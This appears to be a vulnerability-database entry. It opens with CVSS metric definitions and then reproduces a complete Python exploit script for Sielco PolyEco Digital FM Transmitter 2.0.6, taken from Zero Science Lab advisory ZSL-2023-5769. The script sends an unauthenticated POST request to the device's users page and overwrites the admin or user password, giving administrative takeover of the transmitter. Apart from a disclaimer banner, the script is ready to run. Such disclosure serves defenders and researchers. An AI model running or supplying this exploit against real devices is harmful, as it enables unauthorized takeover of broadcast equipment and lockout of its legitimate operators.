The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
## Exploit Author: LiquidWorm
#
#
# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
#
#
# Vendor: Sielco S.r.l
# Product web page: https://www.sielco.org
# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
# PolyEco1000 CPU:1.9.4 FPGA:10.19
# PolyEco1000 CPU:1.9.3 FPGA:10.19
# PolyEco500 CPU:1.7.0 FPGA:10.16
# PolyEco300 CPU:2.0.2 FPGA:10.19
# PolyEco300 CPU:2.0.0 FPGA:10.19
#
# Summary: PolyEco is the innovative family of high-end digital
# FM transmitters of Sielco. They are especially suited as high
# performance power system exciters or compact low-mid power
# transmitters. The same cabinet may in fact be fitted with 50,
# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
# 1000).
#
# All features can be controlled via the large touch-screen display
# 4.3" or remotely. Many advanced features are inside by default
# in the basic version such as: stereo and RDS encoder, audio
# change-over, remote-control via LAN and SNMP, "FFT" spectral
# analysis of the audio sources, SFN synchronization and much more.
#
# Desc: The application suffers from an authentication bypass and
# account takeover/lockout vulnerability that can be triggered by
# directly calling the users object and effectively modifying the
# password of the two constants user/role (user/admin). This can
# be exploited by an unauthenticated adversary by issuing a single
# POST request to the vulnerable endpoint and gain unauthorized
# access to the affected device with administrative privileges.
#
# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5769
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php
#
#
# 26.01.2023
#
#
import requests
print( '''
.- _ _ -.
/ / \\ \\
( ( (` (-o-) `) ) )
\ \_ ` -+- ` _/ /
`- -+- -`
-+-
-+-
-+-
-+-
-+-
-+-
/ \\
*****************************************************
! Sielco PolyEco Authentication Bypass Script !
*****************************************************
Please note that this script is for educational and
ethical purposes only. Using it for unauthorized
access or malicious activities is strictly prohibited
and can have serious legal and ethical consequences.
The responsibility of using this script in a lawful
and ethical manner lies solely with the user. The
author or creator of this script shall not be held
responsible for any unlawful or unethical activities
performed by the users.
''' )
url = input( ' Enter the URL (e.g. http://host:8090): ' )
if not 'http' in url :
url = 'http://{}'.format( url )
user = input( ' Enter the desired role (e.g. user or admin): ')
if user not in [ 'user', 'admin' ] :
exit( ' Only \'user\' or \'admin\' please.' )
password = input( ' Enter the desired password: ' )
end = '/protect/users.htm'
payload = {}
if user == "user" :
payload[ 'pwd_admin' ] = ''
payload[ 'pwd_user' ] = password
elif user == 'admin' :
payload[ 'pwd_admin' ] = password
payload[ 'pwd_user' ] = ''
r = requests.post( url + end, data = payload )
if r.status_code == 200 :
print( '\n MSG: OK.' )
else:
print( '\n MSG: ERROR!' )